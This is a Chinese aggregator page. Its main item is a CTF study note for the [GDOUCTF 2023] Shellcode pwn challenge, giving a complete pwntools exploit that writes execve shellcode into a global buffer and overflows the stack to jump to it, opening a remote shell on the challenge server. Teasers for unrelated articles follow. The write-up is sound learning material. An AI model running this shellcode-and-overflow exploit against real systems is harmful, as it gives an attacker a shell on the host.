news 2026/4/18 4:27:18

[GDOUCTF 2023]Shellcode

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[GDOUCTF 2023]Shellcode

第一次打CTF——PWN篇学习笔记18

向name中注入shellcode再栈溢出返回到该地址执行即可,注意shellcode长度不能超过0x25

from pwn import * import struct ​ context.arch = 'amd64' context.os = 'linux' ​ #io = process('./pwn') io = remote("node4.anna.nssctf.cn",28141) ​ shellcode = asm(''' xor rsi, rsi push rsi mov rdi, 0x68732f2f6e69622f push rdi mov rdi, rsp xor rdx, rdx mov rax, 0x3b syscall ''') ​ io.sendline(shellcode) ​ name = 0x6010A0 ​ payload = cyclic(0xA + 8) + p64(name) ​ io.sendline(payload) ​ io.interactive()
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/18 14:31:51

UI自动化测试:Jenkins配置

🍅 点击文末小卡片,免费获取软件测试全套资料,资料在手,涨薪更快团队下半年的目标之一是实现自动化测试,这里要吐槽一下,之前开发的测试平台了,最初的目的是用来做接口自动化测试和性能测试&…

作者头像 李华
网站建设 2026/4/18 12:39:25

PHP图片处理|画布入门

以下是基于 PHP7.4 的 GD 库实现图片文字写入、绘制图案、渲染已有图片、设置背景色的完整代码案例兼容 PHP7.4 及以上版本: 前置说明 确保服务器已安装 GD 扩展:php -m | grep gd 查看是否存在GD 库常用函数在 PHP7.4 中均兼容,无需特殊适配…

作者头像 李华
网站建设 2026/4/17 19:04:19

Spring Data JPA 方法名查询特性的使用

Spring Data JPA 是 Spring 提供的一个用于简化 JPA(Java Persistence API)开发的框架,方法名查询特性允许你通过定义特定命名规则的方法来自动生成查询语句,而无需手动编写 SQL 或 JPQL(Java Persistence Query Langu…

作者头像 李华
网站建设 2026/4/18 21:28:34

我用一个周末,写了一个“反内卷“的极简笔记工具

前言:我为什么要做这个? 每天我打开电脑,总会有这样的场景: 浏览网页时,看到一段好文案,想临时存一下和 ChatGPT/Claude 聊天时,AI 输出了一段很好的内容,想保存下来刷到一个好网址…

作者头像 李华
网站建设 2026/4/18 14:18:38

Python构建AI Agent自主智能体系统

核心要点 环境建模与状态表示 动作空间与策略选择 奖励机制与反馈循环 训练与优化 1. 环境建模与状态表示 环境建模是AI Agent系统的基础,它决定了Agent如何感知和理解外部世界。状态表示则是将环境中的信息转化为Agent可以处理的形式。 原理 环境建模:定义环境的规则和状态…

作者头像 李华